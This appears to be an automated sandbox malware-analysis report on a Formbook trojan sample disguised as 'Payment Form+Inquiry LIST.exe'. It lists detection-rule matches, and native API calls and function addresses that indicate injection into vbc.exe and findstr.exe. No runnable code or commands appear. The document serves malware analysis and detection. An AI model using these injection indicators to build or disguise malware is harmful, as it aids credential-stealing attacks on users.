            Source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Payment Form+Inquiry LIST.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0042B593 NtClose,3_2_0042B593
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A35C0 NtCreateMutant,LdrInitializeThunk,3_2_051A35C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_051A2DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_051A2C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2B60 NtClose,LdrInitializeThunk,3_2_051A2B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A4650 NtSuspendThread,3_2_051A4650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A3010 NtOpenDirectoryObject,3_2_051A3010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A3090 NtSetValueKey,3_2_051A3090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A4340 NtSetContextThread,3_2_051A4340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2D10 NtMapViewOfSection,3_2_051A2D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A3D10 NtOpenProcessToken,3_2_051A3D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2D00 NtSetInformationFile,3_2_051A2D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2D30 NtUnmapViewOfSection,3_2_051A2D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A3D70 NtOpenThread,3_2_051A3D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2DB0 NtEnumerateKey,3_2_051A2DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2DD0 NtDelayExecution,3_2_051A2DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2C00 NtQueryInformationProcess,3_2_051A2C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2C60 NtCreateKey,3_2_051A2C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2CA0 NtQueryInformationToken,3_2_051A2CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2CC0 NtQueryVirtualMemory,3_2_051A2CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2CF0 NtOpenProcess,3_2_051A2CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2F30 NtCreateSection,3_2_051A2F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2F60 NtCreateProcessEx,3_2_051A2F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2F90 NtProtectVirtualMemory,3_2_051A2F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2FB0 NtResumeThread,3_2_051A2FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2FA0 NtQuerySection,3_2_051A2FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2FE0 NtCreateFile,3_2_051A2FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2E30 NtWriteVirtualMemory,3_2_051A2E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2E80 NtReadVirtualMemory,3_2_051A2E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2EA0 NtAdjustPrivilegesToken,3_2_051A2EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2EE0 NtQueueApcThread,3_2_051A2EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A39B0 NtGetContextThread,3_2_051A39B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2B80 NtQueryInformationFile,3_2_051A2B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2BA0 NtEnumerateValueKey,3_2_051A2BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2BF0 NtAllocateVirtualMemory,3_2_051A2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2BE0 NtQueryValueKey,3_2_051A2BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2AB0 NtWaitForSingleObject,3_2_051A2AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2AD0 NtReadFile,3_2_051A2AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2AF0 NtWriteFile,3_2_051A2AF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F84340 NtSetContextThread,LdrInitializeThunk,7_2_02F84340
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F84650 NtSuspendThread,LdrInitializeThunk,7_2_02F84650
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F835C0 NtCreateMutant,LdrInitializeThunk,7_2_02F835C0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82AF0 NtWriteFile,LdrInitializeThunk,7_2_02F82AF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82AD0 NtReadFile,LdrInitializeThunk,7_2_02F82AD0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82B60 NtClose,LdrInitializeThunk,7_2_02F82B60
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F839B0 NtGetContextThread,LdrInitializeThunk,7_2_02F839B0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02F82EE0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82FE0 NtCreateFile,LdrInitializeThunk,7_2_02F82FE0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82FB0 NtResumeThread,LdrInitializeThunk,7_2_02F82FB0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82F30 NtCreateSection,LdrInitializeThunk,7_2_02F82F30
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02F82CA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02F82C70
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82C60 NtCreateKey,LdrInitializeThunk,7_2_02F82C60
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02F82DF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82DD0 NtDelayExecution,LdrInitializeThunk,7_2_02F82DD0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02F82D30
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02F82D10
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F83090 NtSetValueKey,7_2_02F83090
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F83010 NtOpenDirectoryObject,7_2_02F83010
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82AB0 NtWaitForSingleObject,7_2_02F82AB0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82BF0 NtAllocateVirtualMemory,7_2_02F82BF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82BE0 NtQueryValueKey,7_2_02F82BE0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82BA0 NtEnumerateValueKey,7_2_02F82BA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82B80 NtQueryInformationFile,7_2_02F82B80
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82EA0 NtAdjustPrivilegesToken,7_2_02F82EA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82E80 NtReadVirtualMemory,7_2_02F82E80
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82E30 NtWriteVirtualMemory,7_2_02F82E30
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82FA0 NtQuerySection,7_2_02F82FA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82F90 NtProtectVirtualMemory,7_2_02F82F90
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82F60 NtCreateProcessEx,7_2_02F82F60
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82CF0 NtOpenProcess,7_2_02F82CF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82CC0 NtQueryVirtualMemory,7_2_02F82CC0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82C00 NtQueryInformationProcess,7_2_02F82C00
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82DB0 NtEnumerateKey,7_2_02F82DB0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F83D70 NtOpenThread,7_2_02F83D70
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F83D10 NtOpenProcessToken,7_2_02F83D10
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82D00 NtSetInformationFile,7_2_02F82D00
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006E8000 NtDeleteFile,7_2_006E8000
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006E8090 NtClose,7_2_006E8090
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006E7DC0 NtCreateFile,7_2_006E7DC0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006E7F20 NtReadFile,7_2_006E7F20
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82834800_2_00007FF6E8283480
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8281D800_2_00007FF6E8281D80
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E826D1F00_2_00007FF6E826D1F0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8256AA00_2_00007FF6E8256AA0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8263AC00_2_00007FF6E8263AC0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E825B2C00_2_00007FF6E825B2C0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E825BB600_2_00007FF6E825BB60
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82863B00_2_00007FF6E82863B0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E827C3A00_2_00007FF6E827C3A0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82713840_2_00007FF6E8271384
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E827BC700_2_00007FF6E827BC70
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8261C500_2_00007FF6E8261C50
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E828E4B00_2_00007FF6E828E4B0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82854900_2_00007FF6E8285490
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8262D000_2_00007FF6E8262D00
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8282DB00_2_00007FF6E8282DB0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82535A00_2_00007FF6E82535A0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8286D800_2_00007FF6E8286D80
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82825800_2_00007FF6E8282580
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8267DC00_2_00007FF6E8267DC0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E826FE700_2_00007FF6E826FE70
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82696600_2_00007FF6E8269660
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8257EA00_2_00007FF6E8257EA0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82846E00_2_00007FF6E82846E0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82EC7C00_2_00007FF6E82EC7C0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82768600_2_00007FF6E8276860
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82850600_2_00007FF6E8285060
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E827B8500_2_00007FF6E827B850
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82719300_2_00007FF6E8271930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004017BF3_2_004017BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004028203_2_00402820
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004048A43_2_004048A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0042D9C33_2_0042D9C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0041019A3_2_0041019A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004101A33_2_004101A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004012303_2_00401230
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004032803_2_00403280
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_00416A833_2_00416A83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004103C33_2_004103C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0040E4433_2_0040E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_00401C703_2_00401C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004024FC3_2_004024FC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004025003_2_00402500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051705353_2_05170535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052275713_2_05227571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520D5B03_2_0520D5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052305913_2_05230591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522F43F3_2_0522F43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052224463_2_05222446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051614603_2_05161460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521E4F63_2_0521E4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051947503_2_05194750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051707703_2_05170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522F7B03_2_0522F7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516C7C03_2_0516C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052216CC3_2_052216CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518C6E03_2_0518C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051601003_2_05160100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520A1183_2_0520A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0523B16B3_2_0523B16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F1723_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A516C3_2_051A516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052301AA3_2_052301AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517B1B03_2_0517B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052281CC3_2_052281CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522F0E03_2_0522F0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052270E93_2_052270E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C03_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521F0CC3_2_0521F0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522132D3_2_0522132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515D34C3_2_0515D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522A3523_2_0522A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051B739A3_2_051B739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052303E63_2_052303E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517E3F03_2_0517E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052102743_2_05210274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051752A03_2_051752A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052112ED3_2_052112ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518B2C03_2_0518B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517AD003_2_0517AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05227D733_2_05227D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05173D403_2_05173D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05221D5A3_2_05221D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05188DBF3_2_05188DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518FDC03_2_0518FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516ADE03_2_0516ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170C003_2_05170C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E9C323_2_051E9C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05210CB53_2_05210CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522FCF23_2_0522FCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05160CF23_2_05160CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05190F303_2_05190F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522FF093_2_0522FF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051B2F283_2_051B2F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E4F403_2_051E4F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171F923_2_05171F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522FFB13_2_0522FFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05162FC83_2_05162FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517CFE03_2_0517CFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522EE263_2_0522EE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170E593_2_05170E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05182E903_2_05182E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05179EB03_2_05179EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522CE933_2_0522CE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522EEDB3_2_0522EEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051799503_2_05179950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518B9503_2_0518B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051869623_2_05186962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0523A9A63_2_0523A9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051729A03_2_051729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DD8003_2_051DD800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051728403_2_05172840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517A8403_2_0517A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051568B83_2_051568B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519E8F03_2_0519E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051738E03_2_051738E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522FB763_2_0522FB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522AB403_2_0522AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518FB803_2_0518FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051ADBF93_2_051ADBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05226BD73_2_05226BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05227A463_2_05227A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522FA493_2_0522FA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E3A6C3_2_051E3A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520DAAC3_2_0520DAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516EA803_2_0516EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051B5AA03_2_051B5AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521DAC63_2_0521DAC6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02FF12ED7_2_02FF12ED
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300132D7_2_0300132D
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F6B2C07_2_02F6B2C0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300A3527_2_0300A352
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F552A07_2_02F552A0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02FF02747_2_02FF0274
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_030103E67_2_030103E6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F5E3F07_2_02F5E3F0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F9739A7_2_02F9739A
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F3D34C7_2_02F3D34C
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02FFF0CC7_2_02FFF0CC
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F570C07_2_02F570C0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0301B16B7_2_0301B16B
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_030101AA7_2_030101AA
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_030081CC7_2_030081CC
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F5B1B07_2_02F5B1B0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F3F1727_2_02F3F172
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F8516C7_2_02F8516C
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300F0E07_2_0300F0E0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02FEA1187_2_02FEA118
